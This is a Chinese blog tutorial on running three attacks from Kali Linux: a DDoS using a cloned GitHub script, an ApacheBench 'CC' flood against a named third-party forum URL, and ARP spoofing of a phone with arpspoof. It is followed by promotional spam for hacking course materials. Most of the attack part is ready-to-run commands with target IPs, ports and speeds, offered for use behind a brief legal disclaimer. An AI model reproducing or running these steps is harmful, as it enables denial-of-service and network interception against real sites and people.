当前位置:   article > 正文

Kali Linux三种网络攻击方法总结(DDoS、CC和ARP欺骗)_最强ddos攻击工具kali阻断网络连接

最强ddos攻击工具kali阻断网络连接

本文章使用的是Kali Linux的2020-4-installer-amd64版本

Kali Linux的安装过程本文章不做过多说明,请自行百度

请正确使用DDos和CC攻击,不要用来做违反当地法律法规的事情,否则后果自负


一、DDos攻击

首先,打开一个命令行
在这里插入图片描述

输入以下命令:

git clone https://github.com/Andysun06/ddos

  • 1
  • 2

提示如图所示

请添加图片描述

这样,用于DDos的数据包就已经下载到了你的Kali上

下面,进入你所下载的DDos文件夹,输入命令(注意大小写):

cd ddos

  • 1
  • 2

请添加图片描述

本文用于演示的kali是2020年版本,用python执行ddos-p2.py,输入命令:

python ddos-p2.py

  • 1
  • 2

界面会如下图所示:

请添加图片描述

然后输入攻击对象的IP(本教程以我的博客为例)

再打开一个命令行窗口:

在这里插入图片描述

输入命令:

ping andysun06.gitee.io

  • 1
  • 2

在这里插入图片描述
即可获得攻击对象的IP地址。(获取IP后Ctrl+C可以结束ping)

然后回到刚刚的命令行窗口,输入ping到的IP地址:
请添加图片描述

Attack Port即攻击端口,一般服务器默认为80(更多内容请百度)
Attack Speed即攻击速度,数值越大越快,最大不能超过1000
请添加图片描述

按下回车,如果出现以下界面,即代表已经开始向该IP发起DDos攻击,也就成功了。

在这里插入图片描述

二、CC攻击

首先打开一个命令行窗口在这里插入图片描述
先获得root权限,输入以下命令:

sudo su

  • 1
  • 2

在这里插入图片描述
然后输入你的账号密码(注意:输入后不会显示出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)
在这里插入图片描述
然后输入以下命令:

ab -n 参数1 -c 参数2 网站地址

  • 1
  • 2

参数一是并发数(请求的用户量)
参数二是发送总量(请求的总次数)
(有兴趣的可以在百度上另外学习)
参数1,参数2和网站地址由自己设置,这里以 1000,1000,http://bjvcrrn.nat.ipyingshe.com/bbs/ 为例:

在这里插入图片描述
出现如上界面即代表已经对目标网址开始了CC攻击,如果出现如下界面,即代表CC攻击完成:

在这里插入图片描述

三、ARP欺骗

首先,ARP欺骗需要用到dsniff数据包(arpspoof 是 dsniff 的一个附属工具,所以我们需要安装的是 dsniff),安装命令如下:

apt-get install dsniff

  • 1
  • 2

当然,有可能会遇到部分数据包安装错误的情况,如果你遇到了这种情况,可以参考这个博文:Kali Linux 2020中使用arpspoof

如果你已经安装了dsniff数据包,就可以开始ARP欺骗了,首先,通过以下命令确定你的网卡名称和IP地址:

ifconfig

  • 1
  • 2

在这里插入图片描述
然后嗅探你所在WLAN下所有设备的IP地址,命令如下:

fping -g 本机IP地址/24

  • 1
  • 2

例如我的IP是192.168.0.101,命令就是fping -g 192.168.0.101/24

在这里插入图片描述
我的手机,IP位192.168.0.100就出现在了这里,我们就拿我的手机作为攻击目标,
先获得root权限,输入以下命令:

sudo su

  • 1
  • 2

在这里插入图片描述
然后输入你的账号密码(注意:输入后不会回显出来,不用担心是否输入进去,在输完后按回车,如果输入成功就会获得root权限)
在这里插入图片描述
然后输入以下命令:

arpspoof -i 你的网卡名称 -t 攻击目标的IP地址 攻击目标的网关地址

  • 1
  • 2

网卡名称的查看上文已经提过,我以我的网卡为例,名称是eth0,攻击目标就是我的手机,IP是192.168.0.100,手机的网关就是192.168.0.1(就是IP的最后一位改为1),于是我的攻击命令就是:

arpspoof -i eth0 -t 192.168.0.100 192.168.0.1

  • 1
  • 2

按下回车,如果出现下图回显,就说明正在攻击
在这里插入图片描述
现在,我的手机虽然可以上网,但是速度慢的出奇,几分钟都打不开一个网页图片,这就说明我们的ARP欺骗成功了。

如果你想停止攻击,就按下Ctrl+Z,攻击就停止了。


黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签